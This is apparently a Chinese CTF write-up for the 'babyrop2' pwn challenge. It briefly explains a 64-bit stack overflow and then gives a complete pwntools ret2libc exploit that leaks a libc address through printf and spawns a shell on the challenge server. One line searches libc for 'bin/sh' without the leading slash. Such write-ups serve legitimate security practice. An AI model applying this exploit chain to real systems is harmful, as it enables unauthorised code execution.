开启NX,64位,动态编译,并且给了libc,那估计就是ret2libc的题目了,IDA分析:
明显存在栈溢出,那么就是找system和/bin/sh的问题了,该题给了libc,那就是泄露出真实的libc载入基址本题即可求解。
由于本题是64位的,因此参数要写入寄存器中,顺序为rdi,rsi,rdx,rcx,r8,r9
from pwn import *
context.log_level = True
io=remote("node4.buuoj.cn", 27641)
elf = ELF("./babyrop2")
libc = ELF("./libc.so.6")
printf_plt = elf.plt["printf"]
read_got = elf.got["read"]
main_addr = elf.symbols["main"]
pop_rid_ret = 0x400733
pop_rsi_r15_ret= 0x400731
print_format_str = 0x400770
payload = b'A'*(0x20+8)+p64(pop_rid_ret)+p64(print_format_str)+p64(pop_rsi_r15_ret)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_addr)
io.sendlineafter("name? ",payload)
io.recvline()
io.recvuntil("Welcome to the Pwn World again, ")
read_addr = u64(io.recv(6).ljust(8,b'\x00'))
# read_addr = u64(io.recvuntil('\x7f')[-6:].ljust(0x8,b'\x00')) # 其实用这个更好
log.info("read_addr: "+hex(read_addr))
libc_base = read_addr - libc.symbols["read"]
system_addr = libc_base + libc.symbols["system"]
str_bin_sh = libc_base + next(libc.search(b'bin/sh'))
payload = b'A'*(0x28) + p64(pop_rid_ret) + p64(str_bin_sh) + p64(system_addr)
io.recv()
io.sendline(payload)
io.interactive()